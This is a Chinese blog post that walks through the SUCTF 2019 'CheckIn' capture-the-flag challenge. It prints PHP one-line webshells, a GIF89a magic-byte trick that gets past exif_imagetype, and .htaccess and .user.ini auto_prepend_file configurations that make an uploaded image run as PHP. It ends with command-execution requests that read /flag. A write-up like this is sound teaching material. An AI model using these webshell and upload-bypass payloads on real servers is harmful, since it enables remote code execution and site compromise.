すのはら荘春原庄的雪

[SUCTF 2019]CheckIn 1

Liberty_zs·2022-10-25 19:20·1954 次阅读

[SUCTF 2019]CheckIn 1

[SUCTF 2019]CheckIn 1#

Copy
知识点: .user.ini .htaccess //知识点统细讲放到最后,建议学习一下连接里面的内容 文件上传内容检测 一句话木马 rce命令执行、蚁剑连接

题解:#

1.正常的一句话木马#

上传含有一句话木马的 jpg、png、gif 图片均回显 <? in contents :从这里可以看出题目对文件内容做了限制,我们不能使用带<?的一句话木马

Copy
<?php @eval($_REQUEST['cmd']);?> //开始上传图片中写入的一句话木马 <script language="php">eval($_REQUEST['cmd']);</script> // 用于绕过 <? 还可以在前面加 幻术头绕过 GIF89a(GIF图片的ascii 值)

2.exif_imagetype()函数限制#

成功过滤<? ,发现题目还用exif_imagetype() 函数 对上传文件后缀进行了限制。

exif_imagetype()函数会读取图像的第一个字节,并检查其签名,如果发现了恰当的签名则会返回相应的常量,否则返回false ,我们可以在一句话木马前面加上一个GIF图片文件头前缀GIF89a进行绕过,让函数误认为我们是合法的后缀

Copy
GIF89a <script language='php'>eval($_REQUEST['cmd']);</script> //三种图片的前缀 JPG :FF D8 FF E0 00 10 4A 46 49 46(16进制编码) GIF:47 49 46 38 39 61(ascll值是GIF89a) PNG: 89 50 4E 47

3.user.ini文件#

到现在我们就可以上传成功一个图片了,但它一句话木马并不能被后台服务器解析(可以使用PHPinfo验证),所以这里我们应该怎末想????怎末去绕过???

在学习文件上传时应该都学过, .htaccess 文件,可以把后缀为其他类型的图片解析成php文件对,使我们上传的图片内容可以被解析,但是这里对 .htaccess文件也做了限制,,,所以我们就需要想其他的办法。

Copy
<FilesMatch> SetHandler application/x-httpd-php </FilesMatch>

这里我们引入一个php目录配置文件 .user.ini

作用:这里如果我们上传一个.user.ini 文件,那么当我们访问目录中的任何php文件时,都会调用.user.ini中指的文件以php的形式进行读取我
们在user.ini设置文件

Copy
//上传.user.ini文件,条件如下: (1)服务器脚本语言为PHP (2)对应目录下面有可执行的php文件 //index.php (3)服务器使用CGI/FastCGI模式 上传的文件内容 GIF89a //auto_prepend_file是在文件前插入,而auto_append_file是在文件最后才插入。 auto_prepend_file=b.gif //需要注意上穿的文件名字要和设定的名字一样,这里可以设定多个

成功上传 .user.ini

上传成功b.gif

Copy
GIF89a <script language='php'>eval($_REQUEST['cmd']);</script>

4.用传进去的cmd 进行rce#

然后利用传如shell (cmd参数) ,进行传参

uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?cmd=var_dump(scandir("/")); // 扫描当前目录下的文件,并打印出来

uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?cmd=system('cat /flag');

uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?cmd=var_dump(file_get_contents("/flag"));

或者直接利用蚁剑连接也可以拿到flag

题目涉及知识点详解#

一、.user.ini .htaccess 文件#

php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件。这里我们可以把.user.ini看作是用户自定义的一个php.ini,并且可以利用这个文件来构造后门和隐藏后门。

.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htaccess有局限性。

Copy
举个例子理解user.ini作用: /*这是.user.ini的两个配置 auto_prepend_file是在文件前插入 auto_append_file是在文件最后才插入*/ 1.在user.ini 中设置 auto_prepend_file=b.gif 2.在b.gif中设置 一句话木马 3.还有个php文件 如:前面做题中的index.php 如果这三个条件在同一个目录下面,就会出先问题,这里就相当于 在index.php中写了include "b.gif" , 可以进行文件包含,导致的后果是:当我们对目录中的index.php进行访问的时候,会调用.usre.ini 中的文件把b.gif文件以php的形式进行读取,造成userini的漏洞
Copy
局限 在.user.ini中使用这条配置也说了是在同目录下的其他.php 文件中包含配置中所指定的文件,也就是说需要该目录下存在.php 文件,通常在文件上传中,一般是专门有一个目录用来存在图片,可能小概率会存在.php 文件。 但是有时可以使用 ../ 来将文件上传到其他目录,达到一个利用的效果。
posted @   柳~  阅读(1954)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 在鹅厂做java开发是什么体验
· 百万级群聊的设计实践
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
· 永远不要相信用户的输入:从 SQL 注入攻防看输入验证的重要性
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
点击右上角即可分享
微信分享提示
目录